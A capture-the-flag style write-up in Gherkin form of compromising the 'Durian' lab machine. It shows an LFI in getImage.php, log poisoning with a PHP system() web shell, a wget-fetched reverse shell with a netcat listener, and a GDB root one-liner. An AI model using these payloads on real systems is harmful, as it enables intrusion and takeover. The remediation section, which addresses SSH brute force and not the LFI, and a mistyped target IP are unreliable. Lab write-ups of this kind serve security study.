## Version 1.4.1
## language: en

Feature:
  TOE:
    Durian
  Category:
    Path Traversal
  Location:
    http://192.168.1.62/cgi-data/getImage.php
  CWE:
    CWE-22: Improper Limitation of a Pathname to a Restricted Directory
  Rule:
    REQ.137: Discard unsafe inputs
  Goal:
    Get the root shell
  Recommendation:
    Restrict the path of files to include

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Parrot OS         |  4.10      |
    | Nmap              |  7.80      |
    | Wpscan            |  3.8.8     |
    | Wget              |  0.9       |
    | linpeas.sh        |  2.8.6     |
    | Dirb              |  2.22      |
    | Netcat            |  1.10      |
    | Burp Suite        |  9.2       |
    | VMWare            |  16.0      |

  TOE information:
    Given a file with the .OVA file extension is delivered
    When I run it on Vmware
    And I realize that a user is required to log in to the system
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.1.0/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-20 15:51 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.0060s latency).
    Nmap scan report for 192.168.1.53
    Host is up (0.0047s latency).
    Nmap scan report for 192.168.1.55
    Host is up (0.0054s latency).
    Nmap scan report for 192.168.1.62
    Host is up (0.0010s latency).
    Nmap scan report for 192.168.1.73
    Host is up (0.0027s latency).
    Nmap scan report for 192.168.1.254
    Host is up (0.0029s latency).
    Nmap done: 256 IP addresses (6 hosts up) scanned in 7.23 seconds
    """
    When I determined that the IP of the machine is 192.168.1.62
    Then I scanned the IP and found it has 3 open ports
    """
    $ nmap -sS -sV -p- 192.178.1.71
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-20 15:54 -05
    Nmap scan report for 192.168.1.62
    Host is up (0.0024s latency).
    Not shown: 997 closed ports
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    8088/tcp open  radan-http

    Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds
    """

  Scenario: Normal use case
    Given there is not much to see, nor can I interact with the site
    Then a normal use case is to see a tomato: [evidences](normal.png)

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I see the port 80 open (HTTP)
    When I decide to analyze this service
    And the first thing I do is search for common directories on the server
    Then I do this with the "dirb" tool: [evidences](dirb.png)
    """
    $ dirb http://192.168.1.62/
    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Tue Oct 20 16:02:23 2020
    URL_BASE: http://192.168.1.62/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

    -----------------

    GENERATED WORDS: 4612

    ---- Scanning URL: http://192.168.1.62/ ----
    ==> DIRECTORY: http://192.168.1.62/blog/
    ==> DIRECTORY: http://192.168.1.62/cgi-data/
    + http://192.168.1.62/index.html (CODE:200|SIZE:765)
    + http://192.168.1.62/server-status (CODE:403|SIZE:277)

    ---- Entering directory: http://192.168.1.62/blog/ ----
    + http://192.168.1.62/blog/index.php (CODE:301|SIZE:0)
    ==> DIRECTORY: http://192.168.1.62/blog/wp-admin/
    ==> DIRECTORY: http://192.168.1.62/blog/wp-content/
    ==> DIRECTORY: http://192.168.1.62/blog/wp-includes/
    + http://192.168.1.62/blog/xmlrpc.php (CODE:405|SIZE:42)

    ---- Entering directory: http://192.168.1.62/cgi-data/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
        (Use mode '-w' if you want to scan it anyway)

    ---- Entering directory: http://192.168.1.62/blog/wp-admin/
    """
    And Dirb found two directories
    When accessing the first one I realize that it is a Wordpress
    """
    [evidences](wordpress.png)
    """
    Then I use WPScan to look for any vulnerability on the site
    """
    $ wpscan --url http://192.168.1.62/blog/
    Interesting Finding(s):

    [+] Headers
     | Interesting Entry: Server: Apache/2.4.38 (Debian)
     | Found By: Headers (Passive Detection)
     | Confidence: 100%

    [+] XML-RPC seems to be enabled: http://192.168.1.62/blog/xmlrpc.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
     | References:
    ...
    """
    And I didn't find anything really useful
    Then I decided to focus on the other directory "192.168.1.62/cgi-data/"
    When I find only one file (getImage.php) [evidences](getimage.png)
    And I decided to look at the source code for any clues
    Then I found a GET parameter "commented"
    """
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Document</title>
    </head>
    <body>
        /*
    </?php include $_GET['file']; */
    </body>
    </html>
    """
    Then the name of the parameter is "file"
    And by intuition I assumed that it receives a path from an file
    Then this is very common in Local File Inclusion (LFI) attacks
    And I decided to check if this site is vulnerable to LFI
    """
    http://192.168.1.62/cgi-data/getImage.php?file=/etc/passwd
    """
    And indeed, it is possible to do LFI [evidences](lfi.png)

  Scenario: Fail: Getting RCE from LFI part 1
    Given the server is vulnerable to LFI
    Then my idea was to use this vulnerability to get RCE
    And I learned that it is possible to achieve this by exploiting the logs
    Then this technique is known as Log Poisoning
    And take advantage of the logs of some services to execute code
    """
    Log Poisoning via Mail logs
    Log Poisoning via SSH logs
    Log Poisoning via Apache Logs
    etc
    """
    When my focus is perform an Apache Log Poisoning
    Then I failed because the file: "/var/log/httpd-access.log" is not found
    And the same happened with: "/var/log/auth.log" to SSH Poisoning
    Then I can conclude that the logs files were modified

  Scenario: Success: Getting logs path
    Given my idea is to find the server logs files
    And I have no idea how to do that
    Then I start reading writeups and articles about LFI to RCE
    And I found one interesting:
    """
    https://medium.com/bugbountywriteup/bugbounty-journey-
    from-lfi-to-rce-how-a69afe5a0899
    """
    Then this article shows how to find the logs using file decriptors
    """
    /proc/self/fd/{numbers}
    """ [evidences](nologs.png)
    Then basically it is to analyze the decryptors
    And find the logs in any of them
    """
    http://192.168.1.62/cgi-data/getImage.php?file=/proc/self/fd/{number}
    """
    When I use Burp Suite to automate this task
    Then I find information in decriptor number 7: [evidences](info7.png)
    And when reading it I find a path to the logs: [evidences](durianlogs.png)
    """
    /var/log/durian.log/
    """

  Scenario: Success: Getting RCE from LFI part 2
    Given my initial idea is to get RCE
    And now I have the path of the server logs
    Then I perform an Apache Log Poisoning
    And what I do is inject malicious code into the headers of any http request
    """
    <?php system($_GET['cmd']); ?>
    """
    Then I chose in the User-Agent: [evidences](useragentsys.png)
    And I reflected it in the log
    """
    http://192.168.1.62/cgi-data/getImage.php?file=/var/log/durian.log
    /access.log&cmd=id
    """ [evidences](rce.png)
    And at this point the idea is to get a reverse shell
    Then this is very simple, I used "wget" to download the shell
    And netcat to trigger it
    """
    ?file=/var/log/durian.log/access.log&cmd=wget host/shell.php -O dest
    ...
    nc -lvnp 1234
    """
    Then I got the reverse shell [evidences](shell.png)

  Scenario: Success: Privilege Scalation
    Given I got shell
    When the idea is to get root privileges
    Then for that I must find some way to escalate privileges
    And this weekend I was learning ways to escalate privileges
    When I found a suite called "linpeas"
    """
    https://github.com/carlospolop/privilege-escalation-
    awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
    """
    And it is a full scanner of possibilities to perform a LPE
    When i decided to try it
    """
    $ ./linpeas.sh
    """
    Then I got a lot of information
    And in the capabilities section I found that "GDB"
    Then could be used to escalate privileges [evidences](capabilites.png)
    And again looking for information on this
    Then I found a gtfobins link focused on GDB
    """
    https://gtfobins.github.io/gtfobins/gdb/
    """
    And executing gdb as follows:
    """
    gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
    """
    Then I could get root privileges [evidences](root.png)

  Scenario: Remediation
    Restrict the number of authentication attempts for the SSH service
    And avoid brute force attacks
    Then this can be achieved using CAPTCHA or incremental delays

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      9.6/10 (High) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.5/10 (High) - E:P/RL:W/RC:R
    Environmental:Unique and relevant attributes to a specific user environment
      8.5/10 (High) - CR:L/IR:M/AR:M/MAV:A/MAC:L/MPR:N/MUI:N

  Scenario: Correlations
    No correlations have been found to this date {2020-10-20}
